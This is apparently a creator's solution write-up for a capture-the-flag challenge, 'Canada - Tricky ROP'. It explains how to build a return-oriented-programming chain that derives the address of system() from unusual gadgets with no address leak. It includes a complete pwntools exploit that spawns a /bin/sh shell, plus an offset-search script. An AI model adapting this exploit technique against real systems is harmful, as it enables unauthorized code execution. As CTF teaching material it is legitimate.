Canada - Tricky ROP (Creator Solution)
===========

## Description

A small binary compiled for dynamic linking with one input (gets) and no output(puts,printf) for leak address.  

Mission impossible ?

## Mitigations & @plt

![alt text](img/canada_bin.png)

## Useful Information

The string /bin/sh is hardcoded in the binary.

frame_dummy function with some pretty weird useful gadgets:

0x0000000000401142 : xchg rax, rdx ; ret  
0x000000000040113b : sbb rax, 0xbe35 ; ret  
0x0000000000401134 : add rax, 0xaa4 ; ret  



## IDEA

- 1 Generate the offset between rax and @system (+(add) and -(sbb))
- 2 call rax with the hardcoded "/bin/sh" in rdi


## HOW

rdx is close to @system at segfault (RDX: 0x7ffff7... --> 0x0) so we can exchange their values.
Then we need to calculate the offset to generate :
rax - @sys = 0x372de0

- Generate offset :

Basic example :

if we have only access to:

+3  
-8  

we can generate "every" number:

3+3+3-8 = 1  
3+3-8   = -2  
1-2     = -1  

Something similar happens with 0xbe35 and 0xaa4.


## Offset Generator:


```python
#!/usr/bin/python3

N1=-0xbe35
N2=0xaa4
F=-0x328e
Nb_Try=1000
for y in range(1, Nb_Try):
    for x in range(1, Nb_Try):
        tmp_min=x*N1+y*N2
        if(tmp_min==F):
            print("FOUND({}:{})= {}".format(x,y,hex(tmp_min)))
            break

```


We can use a pop rdi from the binary and finally call rax which contains @system.

Final script:

```python
#!/usr/bin/python2.7
from pwn import *

Name_prog="jj5oo5l5"
context.clear(arch = 'amd64')
e=ELF(Name_prog)
env = {"LD_PRELOAD":"./libc.so.6"}
host="127.0.0.1"
port=31334
mode=1

if  mode==0:
    expl = gdb.debug('./'+Name_prog, '''
    set follow-fork-mode parent
    b main
    c
    ''',env=env)
elif mode==1:
    expl = process("./"+Name_prog,env=env)
else :
    expl = remote(host,port)
xchg = 0x0000000000401142 # : xchg rax, rdx ; ret
sbb  = 0x000000000040113b #: sbb rax, 0xbe35 ; ret
add  = 0x0000000000401134 #: add rax, 0xaa4 ; ret
call = 0x0000000000401010 # : call rax
p_rdi= 0x000000000040121b #: pop rdi ; ret
bin_sh=0x404010

pay=p64(0x41424142)*3
pay+=p64(xchg)
pay+=p64(add)*(31)
pay+=p64(sbb)*76
pay+=p64(p_rdi)
pay+=p64(bin_sh)
pay+=p64(call)
expl.sendline(pay)
expl.interactive()

"""
//comment
gdb-peda$ p system
$1 = {int (const char *)} 0x7f08aa05eaf0 <__libc_system>
gdb-peda$ p $rax
$2 = 0x7f08aa3d18d0

rdx-0x372de0 = sys

rax2 0x372de0/0xbe35=74
rax2 0x372de0%0xbe35|rax2=0x328e # to generate 0x328e


FOUND(2:31:2724) = -0x328e
rax2 0+0xbe35*2-31*0xaa4

"""

```
Info & questions : Azphereax#9449 (Discord)